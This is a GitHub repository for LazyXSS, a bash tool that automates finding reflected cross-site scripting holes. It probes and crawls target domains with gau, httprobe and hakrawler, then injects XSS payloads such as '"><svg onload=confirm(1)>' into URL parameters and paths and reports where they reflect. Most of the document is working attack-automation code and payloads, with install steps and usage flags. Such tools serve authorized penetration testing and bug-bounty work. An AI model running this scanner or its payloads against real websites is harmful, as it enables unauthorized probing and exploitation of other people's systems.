├── LazyXSS.sh
├── README.md
├── install.sh
└── screenshot-lazyxss.png


/LazyXSS.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | export PATH="$PATH:$HOME/go/bin"
  4 | 
  5 | 
  6 | # flags
  7 | 
  8 | while getopts a:t:p:x:h flag
  9 | do
 10 |     case "${flag}" in
 11 |         a) attack=${OPTARG};;
 12 |         t) target=${OPTARG};;
 13 |         p) ports=${OPTARG};;
 14 |         x) custom=${OPTARG};;
 15 |         h) help=${OPT};;
 16 |         *) echo "Invalid option: -$flag" ;;
 17 |     esac
 18 | 
 19 | 
 20 | done
 21 | 
 22 | trap ctrl_c INT
 23 | 
 24 | 
 25 | function rm_tmp () {
 26 | 
 27 |  if [ -f /tmp/probes.tmp ];then rm -f /tmp/probes.tmp;fi
 28 |  if [ -f /tmp/probes.tmp ];then rm -f /tmp/gau.tmp;fi
 29 |  if [ -f /tmp/url-path.tmp ];then rm -f /tmp/url-path.tmp;fi
 30 | 
 31 | }
 32 | 
 33 | function ctrl_c(){
 34 |  echo -e "\n\n\n${red}Made${end} in ${blue}Do${end}"
 35 |  rm_tmp
 36 |  exit 0
 37 | }
 38 | 
 39 | ## VARS
 40 | probe_temp="/tmp/probes.tmp"
 41 | gau_temp="/tmp/gau.tmp"
 42 | 
 43 | if [ "$custom" ]
 44 | then
 45 | 	xss_payload=$custom
 46 | 	reflect=$custom
 47 | else 
 48 | xss_payload='"><svg onload=confirm(1)>'
 49 | reflect="<svg onload=confirm(1)>"
 50 | 
 51 | fi
 52 | 
 53 | 
 54 | ## Colors
 55 | end="\033[0m\e[0m"
 56 | red="\e[0;31m\033[1m"
 57 | blue="\e[0;34m\033[1m"
 58 | yellow="\e[0;33m\033[1m"
 59 | purple="\e[0;35m\033[1m"
 60 | 
 61 | 
 62 | ## banner
 63 | 
 64 | ## Get your current IP
 65 | function ip () {
 66 | IP=$(curl -s ifconfig.me)
 67 | cntry=$(whois $IP|grep country|awk -F ":" '{print $2}'|tr -d ' ')
 68 | 
 69 | echo -e "\n${blue}Your IP is:${end} ${yellow}$IP${end} ${red}$cntry${end}"
 70 | }
 71 | 
 72 | ## Get your IP ?
 73 | # ip 2>/dev/null
 74 | 
 75 | echo -e "${purple}
 76 | 
 77 |  ██▓    ▄▄▄      ▒███████▒▓██   ██▓▒██   ██▒  ██████   ██████ 
 78 | ▓██▒   ▒████▄    ▒ ▒ ▒ ▄▀░ ▒██  ██▒▒▒ █ █ ▒░▒██    ▒ ▒██    ▒ 
 79 | ▒██░   ▒██  ▀█▄  ░ ▒ ▄▀▒░   ▒██ ██░░░  █   ░░ ▓██▄   ░ ▓██▄   
 80 | ▒██░   ░██▄▄▄▄██   ▄▀▒   ░  ░ ▐██▓░ ░ █ █ ▒   ▒   ██▒  ▒   ██▒
 81 | ░██████▒▓█   ▓██▒▒███████▒  ░ ██▒▓░▒██▒ ▒██▒▒██████▒▒▒██████▒▒
 82 | ░ ▒░▓  ░▒▒   ▓▒█░░▒▒ ▓░▒░▒   ██▒▒▒ ▒▒ ░ ░▓ ░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░
 83 | ░ ░ ▒  ░ ▒   ▒▒ ░░░▒ ▒ ░ ▒ ▓██ ░▒░ ░░   ░▒ ░░ ░▒  ░ ░░ ░▒  ░ ░
 84 |   ░ ░    ░   ▒   ░ ░ ░ ░ ░ ▒ ▒ ░░   ░    ░  ░  ░  ░  ░  ░  ░  
 85 |     ░  ░     ░  ░  ░ ░     ░ ░      ░    ░        ░        ░  
 86 |                  ░         ░ ░                                
 87 | 
 88 | By Filiplain
 89 | ${end}
 90 | "
 91 | 
 92 | 
 93 | 
 94 | ## Help Panel
 95 | 
 96 | function help_panel () {
 97 | 
 98 | 
 99 | 
100 | echo -e "
101 | 
102 |   -a)	  Set attack number (1,2,3,4):
103 |           1) Try finding XSS in parameters on Given URL or list of URLs in a File.
104 |           2) Try finding XSS in PATHs on Given URL or list of URLs in a File.
105 |           3) Probe given domain or domains in a file, Crawls the alive URLs and then try to find possible XSS on Parameters.
106 |           eg: -a 3
107 |           4) Fetch URLs of target domain and try to find possible XSS on Parameters.
108 |           eg: -a 4
109 |         
110 |   -t)     Set target giving a URL/domain or a list in a file depending on the attack type. 
111 |  	  eg: -t ./url-list.txt
112 |  	  eg: -t http://vulnpage.test
113 |  	
114 |  	
115 |   -p)     [When using attack #3 only] Set ports to probe (defaults 80,443).
116 | 	  eg: -p 8000,8080,8085,10443
117 | 
118 |   -x)	  [OPTIONAL] Custom XSS Payload (Default: '\"><svg onload=confirm(1)>)'
119 |           eg: -x '\"><sCrIpT>alert(1)<ScRiPt>'
120 | 
121 |   -h)	  Open this help panel
122 | 
123 | "
124 | 
125 | }
126 | 
127 | ## URL encoding for XSS PAYLOAD
128 | 
129 | function url_encode() {
130 |     echo "$xss_payload" \
131 |     | sed \
132 |         -e 's/%/%25/g' \
133 |         -e 's/ /%20/g' \
134 |         -e 's/!/%21/g' \
135 |         -e 's/"/%22/g' \
136 |         -e "s/'/%27/g" \
137 |         -e 's/#/%23/g' \
138 |         -e 's/(/%28/g' \
139 |         -e 's/)/%29/g' \
140 |         -e 's/+/%2b/g' \
141 |         -e 's/,/%2c/g' \
142 |         -e 's/-/%2d/g' \
143 |         -e 's/:/%3a/g' \
144 |         -e 's/;/%3b/g' \
145 |         -e 's/?/%3f/g' \
146 |         -e 's/@/%40/g' \
147 |         -e 's/\$/%24/g' \
148 |         -e 's/\&/%26/g' \
149 |         -e 's/\*/%2a/g' \
150 |         -e 's/\./%2e/g' \
151 |         -e 's/\//%2f/g' \
152 |         -e 's/\[/%5b/g' \
153 |         -e 's/\\/%5c/g' \
154 |         -e 's/\]/%5d/g' \
155 |         -e 's/\^/%5e/g' \
156 |         -e 's/_/%5f/g' \
157 |         -e 's/`/%60/g' \
158 |         -e 's/{/%7b/g' \
159 |         -e 's/|/%7c/g' \
160 |         -e 's/}/%7d/g' \
161 |         -e 's/~/%7e/g'
162 | }
163 | 
164 | payload2=$(echo $(url_encode))
165 | 
166 | ## Format ports into httprobe
167 | function set_ports () {
168 |  for p in $(echo $ports|tr ',' '\n')
169 |   do 
170 |    echo "-p http:$p -p https:$p"|tr '\n' ' ' 
171 |   done
172 | }
173 | 
174 | function target_func () {
175 |   if [ -e $target ]
176 |   then
177 |      cat $target |grep -iE 'http:|https:' >/dev/null && out=$(cat $target|awk -F[/:] '{print $4}') || out=$(cat $target)
178 |     echo $out
179 | 
180 |   else
181 |    echo $target|grep -iE 'http:|https:' >/dev/null && out=$(echo $target|awk -F[/:] '{print $4}') || out=$(echo $target)
182 |    echo $out     
183 |   fi
184 | 
185 | }
186 | 
187 | ## Fetching all target URLs
188 | 
189 | function getallurls () {
190 | 
191 | gau $(target_func) > $gau_temp
192 | echo -e "${yellow} $(wc -l /tmp/gau.tmp|cut -f 1 -d ' ') URLs Found${end}\n"
193 | target=$gau_temp
194 | echo -e "${blue}Finding XSS on fetched URLs${end}"
195 | xss_find2
196 | }
197 | 
198 | ## probing with domais and ports
199 | function probes () { 
200 |   echo $(target_func)|tr ' ' '\n'|httprobe $(set_ports) -c 50 
201 |  
202 | 
203 | }
204 | 
205 | ## Check for valid URL in target 
206 | function url_check () {
207 | 
208 | input=$(echo $(cat $target 2>/dev/null|| echo $target))
209 | echo $input|tr ' ' '\n'|grep -iE 'http:|https:' >/dev/null 2>&1 && echo -n "true"
210 | 
211 | 
212 | }
213 | 
214 | ## Crawl for domains and subs pages
215 | function crawlee () {
216 | 
217 |   for url in $(cat $probe_temp)
218 |    do
219 |     echo -e "\n\n${yellow}Saving Crawl results of${end} $url ${yellow}as${end} /tmp/$(echo $url|tr -d ':'|cut -d'/' -f3).tmp"
220 |     echo $url | hakrawler -subs|grep $(echo $url|awk -F '.' '{ print $2"."$3}') > /tmp/$(echo "$url"|tr -d ':'|cut -d'/' -f3).tmp
221 | 
222 |    done
223 | }
224 | 
225 | ## finding XSS with Probes
226 | function xss_find () { 
227 |   for url_probe in $(cat $probe_temp)
228 |     do
229 |      
230 |       echo -e "\n${yellow}Possible XSS for:${end} $url_probe\n"
231 |       cat /tmp/$(echo $url_probe|tr -d ':'|cut -d'/' -f3).tmp|grep "="|qsreplace "$xss_payload" | airixss -payload "$reflect" | egrep -v 'Not'
232 |     done
233 | } 
234 | 
235 | ## finding XSS With URLs given
236 | function xss_find2 () {
237 | 
238 | if [ $(url_check) == "true" ];
239 | then
240 |  if [ -e $target ]
241 |  then
242 |    cat $target |grep "="|qsreplace "$xss_payload" | airixss -payload "$reflect" | egrep -v 'Not' 
243 |  else
244 |     echo $target |grep "="|qsreplace "$xss_payload" | airixss -payload "$reflect" | egrep -v 'Not' 
245 |  fi
246 | else
247 |    echo -e "${red}\n\nPlease provide valid URLs for testing XSS or please use attack type #3${end}"
248 | fi
249 | 
250 | } 
251 | 
252 | function path_xss () {
253 | 
254 | if [ $(url_check) == "true" ];
255 | then
256 |  if [ -e $target ]
257 |    then
258 |    urls=$(cat $target)
259 |  else
260 |    urls=$(echo $target)
261 | 
262 |  fi
263 |  if [ $(echo $urls|tr ' ' '\n'|wc -l) -lt 2001 ];then
264 |   echo -e "${yellow}\nWait ... The Lazy XSS is Generating the possible combinations of paths\n${end}"
265 |    urls_filtered=$(echo "$urls"|awk -F '?' '{ print $1 }'|sort -u)
266 |    for url in $(echo $urls_filtered|tr ' ' '\n')
267 |    
268 |    do
269 |     input=$(echo $url|tr '/' '\n'|sed '1,3d')
270 |     for w in $(seq 1 $( echo "$input" |wc -l));
271 |     do
272 |      word=$(echo $input|tr ' ' '\n'| sed "$w,$w!d")
273 |      out=$(echo $url|sed "s/$word/$payload2/" 2>/dev/null)
274 |      echo $out >> /tmp/url-path.tmp &
275 |     done
276 |    done
277 |    echo -e "\n${yellow}It is Done${end}\n"
278 |    echo -e "\n${yellow}\nLooking for Possible XSS on combinations...${end}"
279 |    cat /tmp/url-path.tmp|airixss -payload "$reflect" | egrep -vE 'Not|not'
280 |  else
281 |    echo -e "${red}\nToo Many URLs (Max 2000), this attack type takes too much time... please use less or try using attack #1 ${end}"
282 |  fi
283 | else 
284 |    echo -e "${red}\n\nPlease provide valid URLs for testing XSS or please use attack type #2${end}"
285 | fi
286 | }
287 | 
288 | if [ $1 == '-h' ];then
289 |   help_panel
290 | else
291 | if [ $1 ];then 
292 |  if [ $attack == "4" ]
293 |   then
294 |    echo -e "The attack type selected was ${red}#$attack${end}:\n"
295 |    echo "Fetching all URLs of the target and then finding XSS on Parameters (=)"
296 |     echo -e "\n${yellow}[This could take a lot of time depending on the target]${end}\n"
297 |    getallurls
298 | 
299 |  elif [ $attack == "3" ]
300 |   then
301 |    echo -e "The attack type selected was ${red}#$attack${end}:\n"
302 |    echo "Probing, Crawling and Testing for XSS on given domains"
303 |    echo -e "\n${blue}Probing target with ports:${end} (Defaults 80,443) $(echo $ports|tr ',' ' ')\n"
304 |    probes|tee $probe_temp
305 |    echo -e "\n${blue}Crawling alive URLs:${end}"
306 |    crawlee
307 |    echo -e "\n${blue}Testing for Possible XSS on Parameters (=):${end}"
308 |    xss_find
309 | 
310 | 
311 |  elif [ $attack == "1" ]
312 |   then
313 |    echo -e "The attack type selected was ${red}#$attack${end}:\n"
314 |    echo "Testing for XSS on given URL/URLs"
315 |    echo -e "\n${blue}Testing for Possible XSS on Parameters (=):${end}"
316 |    xss_find2
317 | 
318 |  elif [ $attack == "2" ]
319 |   then
320 |     echo -e "The attack type selected was ${red}#$attack${end}:\n"
321 |     echo -e "\n${blue}Testing for Possible XSS on Paths (/< >/):${end}"
322 |     path_xss
323 |  
324 |  
325 |  else 
326 | 
327 |    echo "Invalid Attack Number"
328 |    help_panel
329 | 
330 |  fi
331 |  
332 | else
333 | 
334 |  help_panel
335 | 
336 | fi
337 | 
338 | fi
339 | echo -e "\n\n\n${red}Made${end} in ${blue}Do${end}"
340 | rm_tmp
341 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # LazyXSS
 2 | 
 3 | ![](https://raw.githubusercontent.com/Filiplain/LazyXSS/main/screenshot-lazyxss.png)
 4 | 
 5 | ## Install
 6 | (Make sure to have `golang-go` installed.)
 7 | 
 8 | ```
 9 | git clone https://github.com/Filiplain/LazyXSS.git
10 | cd LazyXSS
11 | ./install.sh
12 | ```
13 | 
14 | ## Description
15 | Script to automate XSS finding with the help of the following tools:
16 | 
17 | * airixss\
18 | https://github.com/ferreiraklet/airixss
19 | * hakrawler\
20 | https://github.com/hakluke/hakrawler
21 | * qsreplace\
22 | https://github.com/tomnomnom/qsreplace
23 | * httprobe\
24 | https://github.com/tomnomnom/httprobe
25 | * gau\
26 | https://github.com/lc/gau
27 | 
28 | 
29 | ## Usage
30 | ~~~
31 | ./LazyXSS.sh -t < target > -a < # >
32 | ~~~
33 | 
34 | ## Available Flags
35 | ~~~~
36 |   -a)     Set attack number (1,2,3,4):
37 |               1) Try finding XSS in parameters on Given URL or list of URLs in a File.
38 |               2) Try finding XSS in PATHs on Given URL or list of URLs in a File.
39 |               3) Probe given domain or domains in a file, Crawls the alive URLs and then try to find possible XSS on Parameters.
40 |               eg: -a 3
41 |               4) Fetch URLs of target domain and try to find possible XSS on Parameters.
42 |               eg: -a 4
43 |         
44 |   -t)     Set target giving a URL/domain or a list in a file depending on the attack type. 
45 |  	      eg: -t ./url-list.txt
46 |  	      eg: -t http://vulnpage.test
47 |  	
48 |  	
49 |   -p)     [When using attack #3 only] Set ports to probe (defaults 80,443).
50 | 	      eg: -p 8000,8080,8085,10443
51 |   -x)     [OPTIONAL] Custom XSS Payload (Default: '\"><svg onload=confirm(1)>)'
52 |               eg: -x '\"><sCrIpT>alert(1)<ScRiPt>'
53 |   
54 |   -h)	  Open this help panel
55 | 
56 | ~~~~
57 | 
58 | 
59 | ## Things to note
60 | * To get better results you can use the '-x' flag to use your own XSS paylaod
61 | * the `-p` flag is only used when the attack type is #3
62 | * Attack #2 only accepts 2000 urls, because it requires too much time to combine every URL path with the XSS payload
63 | * Attack #1 and #2 only accepts URLs, not domains.
64 | * Attack #3 will accept URLs but it only uses the domain in the URLs.
65 | * Attack #4 Could take a lot of time to fetch the URLs depending on the amount
66 | * This is a new project, so a lot of changes will be made soon.
67 | 
68 | 
69 | 


--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
 1 | echo "Installing AiriXSS:...\n"
 2 | go install github.com/ferreiraklet/airixss@latest
 3 | 
 4 | echo "Installing gau:...\n"
 5 | go install github.com/lc/gau/v2/cmd/gau@latest
 6 | 
 7 | echo "Installing Hakrawler...\n"
 8 | 
 9 | go install github.com/hakluke/hakrawler@latest
10 | 
11 | echo "Installing Httprobe...\n"
12 | 
13 | go install github.com/tomnomnom/httprobe@latest
14 | 
15 | echo "Installing Qsreplace...\n"
16 | 
17 | go install github.com/tomnomnom/qsreplace@latest
18 | 
19 | 


--------------------------------------------------------------------------------
/screenshot-lazyxss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Filiplain/LazyXSS/dbf0eba4d20b250e23f69b6bbf2af7506e9c26e8/screenshot-lazyxss.png


--------------------------------------------------------------------------------